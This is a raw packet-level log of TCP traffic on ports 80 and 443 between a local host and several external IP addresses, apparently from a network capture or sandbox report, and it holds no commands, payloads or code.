Mar 28, 2024 09:14:59.513102055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513124943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513149977 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513149977 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513160944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513195038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513195038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513201952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513217926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513247967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513256073 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513271093 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513295889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513295889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513303995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.513339996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.513339996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514000893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514034033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514055014 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514075041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514076948 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514147997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514162064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514205933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514205933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514238119 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514251947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514276981 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514302969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.514314890 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514314890 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514343977 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.514991045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515013933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515039921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515059948 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515074968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515086889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515091896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515117884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515125990 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515125990 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515131950 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515187025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515194893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515199900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515222073 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515294075 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515337944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515403986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515866995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515924931 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515938997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515950918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.515965939 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.515985012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516004086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516004086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516015053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516028881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516045094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516069889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516069889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516093969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516144991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516236067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516421080 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.516458035 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.516483068 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.516494036 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.516834974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516859055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516871929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516885042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516890049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516916037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.516931057 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516931057 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.516993999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517008066 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517079115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517090082 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517107964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517123938 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517168999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517204046 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517204046 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517740965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517755985 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517786980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517823935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517838001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517838955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517838955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517852068 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517879963 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517891884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517904043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517904043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.517950058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.517982006 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518043995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518692017 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518704891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518742085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518778086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518791914 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518820047 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518837929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518851995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518863916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518876076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518876076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518878937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518925905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518925905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.518932104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.518945932 CET	80	49762	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.518958092 CET	80	49762	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.518969059 CET	80	49762	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.519011021 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.519020081 CET	49762	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.519335985 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.519385099 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.519500971 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.519593000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.519620895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.519671917 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.519684076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.519711018 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.519725084 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.519747019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.519758940 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520143032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520157099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520176888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520184040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520227909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520227909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520231009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520245075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520279884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520287037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520287037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520317078 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520330906 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520356894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520373106 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.520478964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.520478964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.521024942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.521138906 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.521164894 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.521186113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.521251917 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.522839069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.522854090 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.522902012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.522912979 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.522948027 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.522964954 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.523005009 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.529742956 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.529791117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.529841900 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.532944918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.532963037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.533025026 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.535541058 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.535588026 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.535598040 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.536119938 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.536135912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.536171913 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.536195993 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.536195993 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.536509037 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.536529064 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.536539078 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.536566019 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.542538881 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.542555094 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.542598009 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.542627096 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.542643070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.542656898 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.542699099 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.549659967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.549688101 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.549732924 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.551561117 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.551577091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.551619053 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.551656961 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.555885077 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.555902958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.555948019 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.560758114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.560775042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.560813904 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.560848951 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.563124895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.563174963 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.563513994 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.563556910 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.569184065 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.569272041 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.569327116 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.569339037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.569366932 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.569421053 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.575421095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.575442076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.575488091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.577847004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.577907085 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.577960014 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.577974081 CET	80	49764	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.577986002 CET	80	49764	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.578006983 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.578012943 CET	80	49764	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.578052044 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.578089952 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.581445932 CET	80	49763	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.581518888 CET	80	49763	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.581530094 CET	80	49763	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.581569910 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.581604004 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.581738949 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.581753969 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.581789970 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.586239100 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.586253881 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.586307049 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.588274002 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.588288069 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.588332891 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.594084978 CET	49762	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.594263077 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.594301939 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.594465017 CET	49768	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.594528913 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.594542980 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.594575882 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.594594002 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.594594955 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.594608068 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.594635010 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.594681978 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.594683886 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.594717979 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.594868898 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:14:59.594904900 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:14:59.595299006 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:14:59.595426083 CET	49764	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.595679045 CET	49770	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.595861912 CET	49763	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.596055984 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:14:59.596066952 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:14:59.596095085 CET	49771	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.596808910 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.600913048 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.600929976 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.601010084 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.603153944 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.603203058 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.603255987 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.606903076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.607002020 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.607053041 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.611576080 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.611598015 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.611656904 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.612895012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.612927914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.612962008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.612982035 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.612993002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613015890 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613106012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613152981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613181114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613215923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613260984 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613292933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613325119 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613336086 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613368034 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613383055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613396883 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613428116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613440990 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613442898 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613491058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613529921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613564968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613579988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613609076 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613612890 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613627911 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613636017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613656998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613679886 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613704920 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613730907 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613760948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613774061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613775015 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613814116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613830090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613842964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.613847017 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613864899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.613890886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.613900900 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.613914967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613925934 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613967896 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.613979101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.613996029 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614006996 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614011049 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614033937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614049911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614063978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614079952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614105940 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614106894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614137888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614177942 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614224911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614238024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614249945 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614267111 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614276886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614296913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614322901 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614322901 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614336967 CET	80	49734	195.20.16.46	192.168.2.4
